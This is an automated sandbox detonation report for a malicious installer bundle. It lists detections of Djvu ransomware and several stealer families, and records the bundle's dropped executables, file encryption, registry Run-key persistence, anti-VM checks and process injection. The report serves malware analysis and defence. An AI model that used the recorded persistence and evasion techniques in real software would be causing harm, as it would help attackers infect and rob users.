memory/832-436-0x0000000007350000-0x0000000007351000-memory.dmp

memory/5396-431-0x0000000004B60000-0x000000000505E000-memory.dmp

memory/1880-427-0x0000023F34460000-0x0000023F344D4000-memory.dmp

memory/4268-446-0x000000007E9C0000-0x000000007E9C1000-memory.dmp

memory/4628-452-0x0000000000000000-mapping.dmp

memory/1228-453-0x000001A3EE940000-0x000001A3EE9B4000-memory.dmp

memory/5856-455-0x0000000004BE0000-0x0000000004BE1000-memory.dmp

memory/2664-449-0x0000015E17700000-0x0000015E17774000-memory.dmp

memory/832-443-0x0000000007354000-0x0000000007356000-memory.dmp

memory/2656-439-0x00000208919A0000-0x0000020891A14000-memory.dmp

memory/5664-459-0x0000000000000000-mapping.dmp

memory/4268-464-0x0000000006C73000-0x0000000006C74000-memory.dmp

memory/5936-465-0x0000000005380000-0x0000000005986000-memory.dmp

memory/1136-468-0x0000000000000000-mapping.dmp

memory/3808-476-0x0000000000000000-mapping.dmp

memory/2500-497-0x0000000000000000-mapping.dmp

memory/4648-496-0x0000000000000000-mapping.dmp

memory/5256-540-0x0000000000000000-mapping.dmp

memory/5768-545-0x0000000000000000-mapping.dmp

memory/5256-548-0x0000000000750000-0x0000000000751000-memory.dmp

memory/5256-550-0x0000000004720000-0x000000000486B000-memory.dmp

memory/5256-552-0x0000000004930000-0x00000000049E6000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-09-11 20:41

Reported

2021-09-11 21:12

Platform

win7-fr

Max time kernel

1812s

Max time network

1815s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"

Signatures

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe

Raccoon

stealer raccoon

RedLine

infostealer redline

RedLine Payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Socelars

stealer socelars

Socelars Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar

stealer vidar

Checks for common network interception software

evasion

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\is-1V4CJ.tmp\46807GHF____.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat191649b47c9e2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19e4750dd01.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat199ba8a4637dcb034.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19ba05e89ea6d406.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat1946eb84e6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19c6762a08beae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-SP2J3.tmp\Sat19ba05e89ea6d406.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-1V4CJ.tmp\46807GHF____.exe N/A
N/A N/A C:\ProgramData\795168.exe N/A
N/A N/A C:\ProgramData\8209560.exe N/A
N/A N/A C:\ProgramData\6384253.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\YFFUNBFGNC\ultramediaburner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f5-5904a-b33-73c84-e4f8fc1c025d0\Vososamime.exe N/A
N/A N/A C:\ProgramData\5771500.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e-3199b-ad4-385bd-5a896535a5cb6\Maeqeshyhoto.exe N/A
N/A N/A C:\ProgramData\7915684.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JOLEN.tmp\ultramediaburner.tmp N/A
N/A N/A C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE N/A
N/A N/A C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe N/A
N/A N/A C:\ProgramData\6384253.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\w0mdl44t.swb\GcleanerEU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\uugw3lq1.b1o\anyname.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\paau0ga2.dmq\gcleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\510D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6AA6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8BAE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8BAE.exe N/A
N/A N/A C:\Windows\system32\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8BAE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BEEF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WnUKuKwEyu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\629F.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A8B4.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe N/A
N/A N/A C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe N/A
N/A N/A C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe N/A
N/A N/A C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe N/A
N/A N/A C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe N/A
N/A N/A C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\LimitEnter.png => C:\Users\Admin\Pictures\LimitEnter.png.wiot C:\Users\Admin\AppData\Local\Temp\8BAE.exe N/A
File opened for modification C:\Users\Admin\Pictures\SplitSkip.tiff C:\Users\Admin\AppData\Local\Temp\8BAE.exe N/A
File renamed C:\Users\Admin\Pictures\SplitSkip.tiff => C:\Users\Admin\Pictures\SplitSkip.tiff.wiot C:\Users\Admin\AppData\Local\Temp\8BAE.exe N/A
File renamed C:\Users\Admin\Pictures\InitializeWatch.png => C:\Users\Admin\Pictures\InitializeWatch.png.wiot C:\Users\Admin\AppData\Local\Temp\8BAE.exe N/A
File opened for modification C:\Users\Admin\Pictures\MergeExpand.tiff C:\Users\Admin\AppData\Local\Temp\8BAE.exe N/A
File renamed C:\Users\Admin\Pictures\MergeExpand.tiff => C:\Users\Admin\Pictures\MergeExpand.tiff.wiot C:\Users\Admin\AppData\Local\Temp\8BAE.exe N/A
File renamed C:\Users\Admin\Pictures\OpenStart.tif => C:\Users\Admin\Pictures\OpenStart.tif.wiot C:\Users\Admin\AppData\Local\Temp\8BAE.exe N/A
File renamed C:\Users\Admin\Pictures\OutWatch.crw => C:\Users\Admin\Pictures\OutWatch.crw.wiot C:\Users\Admin\AppData\Local\Temp\8BAE.exe N/A
File renamed C:\Users\Admin\Pictures\RestoreNew.raw => C:\Users\Admin\Pictures\RestoreNew.raw.wiot C:\Users\Admin\AppData\Local\Temp\8BAE.exe N/A
File renamed C:\Users\Admin\Pictures\ResumePublish.raw => C:\Users\Admin\Pictures\ResumePublish.raw.wiot C:\Users\Admin\AppData\Local\Temp\8BAE.exe N/A
File renamed C:\Users\Admin\Pictures\SplitUnlock.tif => C:\Users\Admin\Pictures\SplitUnlock.tif.wiot C:\Users\Admin\AppData\Local\Temp\8BAE.exe N/A
File renamed C:\Users\Admin\Pictures\TraceJoin.png => C:\Users\Admin\Pictures\TraceJoin.png.wiot C:\Users\Admin\AppData\Local\Temp\8BAE.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\4010.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\4010.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19e4750dd01.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19e4750dd01.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19ba05e89ea6d406.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19ba05e89ea6d406.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat1946eb84e6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat1946eb84e6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19ba05e89ea6d406.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-SP2J3.tmp\Sat19ba05e89ea6d406.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-SP2J3.tmp\Sat19ba05e89ea6d406.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-SP2J3.tmp\Sat19ba05e89ea6d406.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-SP2J3.tmp\Sat19ba05e89ea6d406.tmp N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\ProgramData\8209560.exe N/A
N/A N/A C:\ProgramData\8209560.exe N/A
N/A N/A C:\ProgramData\6384253.exe N/A
N/A N/A C:\ProgramData\6384253.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\YFFUNBFGNC\ultramediaburner.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\YFFUNBFGNC\ultramediaburner.exe N/A
N/A N/A C:\ProgramData\5771500.exe N/A
N/A N/A C:\ProgramData\5771500.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\YFFUNBFGNC\ultramediaburner.exe N/A
N/A N/A C:\ProgramData\7915684.exe N/A
N/A N/A C:\ProgramData\7915684.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JOLEN.tmp\ultramediaburner.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JOLEN.tmp\ultramediaburner.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JOLEN.tmp\ultramediaburner.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JOLEN.tmp\ultramediaburner.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JOLEN.tmp\ultramediaburner.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JOLEN.tmp\ultramediaburner.tmp N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Media Player\\ZHavetohamo.exe\"" C:\Users\Admin\AppData\Local\Temp\is-1V4CJ.tmp\46807GHF____.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" C:\ProgramData\8209560.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\\8BAE.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\8BAE.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\4010.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A api.2ip.ua N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\4010.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2932 set thread context of 2944 N/A C:\ProgramData\6384253.exe C:\ProgramData\6384253.exe
PID 2660 set thread context of 2448 N/A C:\Users\Admin\AppData\Local\Temp\8BAE.exe C:\Users\Admin\AppData\Local\Temp\8BAE.exe
PID 2908 set thread context of 2128 N/A C:\Windows\system32\DllHost.exe C:\Users\Admin\AppData\Local\Temp\8BAE.exe
PID 2028 set thread context of 2536 N/A C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build2.exe C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build2.exe
PID 2636 set thread context of 2724 N/A C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build3.exe C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build3.exe
PID 2400 set thread context of 688 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
PID 1956 set thread context of 2456 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
PID 1732 set thread context of 1504 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
PID 7960 set thread context of 7976 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
PID 2504 set thread context of 2340 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
PID 7956 set thread context of 8012 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
PID 8028 set thread context of 7956 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
PID 7944 set thread context of 8000 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
